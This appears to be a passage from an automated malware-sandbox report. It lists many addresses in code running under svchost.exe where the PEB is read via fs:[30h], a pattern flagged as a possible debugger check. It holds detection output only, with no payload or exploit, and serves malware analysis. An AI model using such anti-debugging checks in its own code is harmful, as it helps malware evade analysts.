                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]2_2_03A2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]2_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]2_2_03A3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D08D mov eax, dword ptr fs:[00000030h]2_2_03A2D08D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A35096 mov eax, dword ptr fs:[00000030h]2_2_03A35096
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D090 mov eax, dword ptr fs:[00000030h]2_2_03A5D090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D090 mov eax, dword ptr fs:[00000030h]2_2_03A5D090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6909C mov eax, dword ptr fs:[00000030h]2_2_03A6909C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A550E4 mov eax, dword ptr fs:[00000030h]2_2_03A550E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A550E4 mov ecx, dword ptr fs:[00000030h]2_2_03A550E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03A2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]2_2_03A380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03A2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]2_2_03A720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B050D9 mov eax, dword ptr fs:[00000030h]2_2_03B050D9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03AAD0C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03AAD0C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]2_2_03AB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A590DB mov eax, dword ptr fs:[00000030h]2_2_03A590DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]2_2_03A2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]2_2_03A2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]2_2_03AF903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]2_2_03AF903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]2_2_03AF903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF903E mov eax, dword ptr fs:[00000030h]2_2_03AF903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB106E mov eax, dword ptr fs:[00000030h]2_2_03AB106E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05060 mov eax, dword ptr fs:[00000030h]2_2_03B05060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov ecx, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41070 mov eax, dword ptr fs:[00000030h]2_2_03A41070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]2_2_03A5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD070 mov ecx, dword ptr fs:[00000030h]2_2_03AAD070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]2_2_03A32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD705E mov ebx, dword ptr fs:[00000030h]2_2_03AD705E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD705E mov eax, dword ptr fs:[00000030h]2_2_03AD705E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B052 mov eax, dword ptr fs:[00000030h]2_2_03A5B052
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB97A9 mov eax, dword ptr fs:[00000030h]2_2_03AB97A9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABF7AF mov eax, dword ptr fs:[00000030h]2_2_03ABF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B037B6 mov eax, dword ptr fs:[00000030h]2_2_03B037B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]2_2_03A307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D7B0 mov eax, dword ptr fs:[00000030h]2_2_03A5D7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F7BA mov eax, dword ptr fs:[00000030h]2_2_03A2F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF78A mov eax, dword ptr fs:[00000030h]2_2_03AEF78A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3D7E0 mov ecx, dword ptr fs:[00000030h]2_2_03A3D7E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A357C0 mov eax, dword ptr fs:[00000030h]2_2_03A357C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A357C0 mov eax, dword ptr fs:[00000030h]2_2_03A357C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A357C0 mov eax, dword ptr fs:[00000030h]2_2_03A357C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]2_2_03AB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF72E mov eax, dword ptr fs:[00000030h]2_2_03AEF72E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A33720 mov eax, dword ptr fs:[00000030h]2_2_03A33720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4F720 mov eax, dword ptr fs:[00000030h]2_2_03A4F720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4F720 mov eax, dword ptr fs:[00000030h]2_2_03A4F720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4F720 mov eax, dword ptr fs:[00000030h]2_2_03A4F720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF972B mov eax, dword ptr fs:[00000030h]2_2_03AF972B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]2_2_03B0B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]2_2_03B0B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]2_2_03B0B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B73C mov eax, dword ptr fs:[00000030h]2_2_03B0B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29730 mov eax, dword ptr fs:[00000030h]2_2_03A29730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29730 mov eax, dword ptr fs:[00000030h]2_2_03A29730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A65734 mov eax, dword ptr fs:[00000030h]2_2_03A65734
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3973A mov eax, dword ptr fs:[00000030h]2_2_03A3973A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3973A mov eax, dword ptr fs:[00000030h]2_2_03A3973A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37703 mov eax, dword ptr fs:[00000030h]2_2_03A37703
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A35702 mov eax, dword ptr fs:[00000030h]2_2_03A35702
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A35702 mov eax, dword ptr fs:[00000030h]2_2_03A35702
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6F71F mov eax, dword ptr fs:[00000030h]2_2_03A6F71F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6F71F mov eax, dword ptr fs:[00000030h]2_2_03A6F71F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]2_2_03A2B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]2_2_03A2B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]2_2_03A2B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B765 mov eax, dword ptr fs:[00000030h]2_2_03A2B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43740 mov eax, dword ptr fs:[00000030h]2_2_03A43740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43740 mov eax, dword ptr fs:[00000030h]2_2_03A43740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43740 mov eax, dword ptr fs:[00000030h]2_2_03A43740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03749 mov eax, dword ptr fs:[00000030h]2_2_03B03749
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D6AA mov eax, dword ptr fs:[00000030h]2_2_03A2D6AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D6AA mov eax, dword ptr fs:[00000030h]2_2_03A2D6AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A276B2 mov eax, dword ptr fs:[00000030h]2_2_03A276B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A276B2 mov eax, dword ptr fs:[00000030h]2_2_03A276B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A276B2 mov eax, dword ptr fs:[00000030h]2_2_03A276B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]2_2_03AB368C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]2_2_03AB368C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]2_2_03AB368C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB368C mov eax, dword ptr fs:[00000030h]2_2_03AB368C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC36EE mov eax, dword ptr fs:[00000030h]2_2_03AC36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03A5D6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03A5D6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A636EF mov eax, dword ptr fs:[00000030h]2_2_03A636EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AED6F0 mov eax, dword ptr fs:[00000030h]2_2_03AED6F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03A3B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC mov eax, dword ptr fs:[00000030h]2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF6C7 mov eax, dword ptr fs:[00000030h]2_2_03AEF6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A616CF mov eax, dword ptr fs:[00000030h]2_2_03A616CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F626 mov eax, dword ptr fs:[00000030h]2_2_03A2F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05636 mov eax, dword ptr fs:[00000030h]2_2_03B05636
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A61607 mov eax, dword ptr fs:[00000030h]2_2_03A61607
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6F603 mov eax, dword ptr fs:[00000030h]2_2_03A6F603
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
